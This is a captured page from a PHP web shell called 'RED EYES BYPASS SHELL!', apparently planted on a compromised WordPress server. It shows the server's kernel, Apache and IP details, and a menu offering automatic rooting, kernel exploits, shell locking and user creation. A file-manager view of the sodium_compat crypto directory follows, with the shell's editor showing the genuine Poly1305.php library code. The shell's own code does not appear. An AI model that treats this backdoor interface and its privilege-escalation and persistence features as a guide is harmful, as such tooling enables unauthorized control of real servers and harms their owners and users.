Linux sothorn202 5.15.0-161-generic #171-Ubuntu SMP Sat Oct 11 08:17:01 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 202.28.82.202 | : 216.73.216.9
pkexec version 0.105
Cant Read [ /etc/named.conf ]
iqtd
RED EYES BYPASS SHELL!
Terminal
Auto Root
Adminer
Backdoor Destroyer
Kernel Exploit
Lock Shell
Lock File
Create User
+ Create Folder
+ Create File
/
home /
iqtd /
wp-includes /
sodium_compat /
src /
Core /
[ HOME SHELL ]
NAME
SIZE
PERMISSION
ACTION
AEGIS
[ DIR ]
drwxr-xr-x
AES
[ DIR ]
drwxr-xr-x
Base64
[ DIR ]
drwxr-xr-x
ChaCha20
[ DIR ]
drwxr-xr-x
Curve25519
[ DIR ]
drwxr-xr-x
Poly1305
[ DIR ]
drwxr-xr-x
SecretStream
[ DIR ]
drwxr-xr-x
AEGIS128L.php
3.58
KB
-rw-r--r--
AEGIS256.php
3.51
KB
-rw-r--r--
AES.php
15.51
KB
-rw-r--r--
BLAKE2b.php
23.63
KB
-rw-r--r--
ChaCha20.php
12.63
KB
-rw-r--r--
Curve25519.php
139.29
KB
-rw-r--r--
Ed25519.php
17.07
KB
-rw-r--r--
HChaCha20.php
3.78
KB
-rw-r--r--
HSalsa20.php
3.59
KB
-rw-r--r--
Poly1305.php
1.54
KB
-rw-r--r--
Ristretto255.php
21.37
KB
-rw-r--r--
Salsa20.php
8.04
KB
-rw-r--r--
SipHash.php
8.04
KB
-rw-r--r--
Util.php
28.25
KB
-rw-r--r--
X25519.php
9.23
KB
-rw-r--r--
XChaCha20.php
3.29
KB
-rw-r--r--
XSalsa20.php
1.34
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Poly1305.php
<?php if (class_exists('ParagonIE_Sodium_Core_Poly1305', false)) { return; } /** * Class ParagonIE_Sodium_Core_Poly1305 */ abstract class ParagonIE_Sodium_Core_Poly1305 extends ParagonIE_Sodium_Core_Util { const BLOCK_SIZE = 16; /** * @internal You should not use this directly from another application * * @param string $m * @param string $key * @return string * @throws SodiumException * @throws TypeError */ public static function onetimeauth($m, $key) { if (self::strlen($key) < 32) { throw new InvalidArgumentException( 'Key must be 32 bytes long.' ); } $state = new ParagonIE_Sodium_Core_Poly1305_State( self::substr($key, 0, 32) ); return $state ->update($m) ->finish(); } /** * @internal You should not use this directly from another application * * @param string $mac * @param string $m * @param string $key * @return bool * @throws SodiumException * @throws TypeError */ public static function onetimeauth_verify($mac, $m, $key) { if (self::strlen($key) < 32) { throw new InvalidArgumentException( 'Key must be 32 bytes long.' ); } $state = new ParagonIE_Sodium_Core_Poly1305_State( self::substr($key, 0, 32) ); $calc = $state ->update($m) ->finish(); return self::verify_16($calc, $mac); } }
Close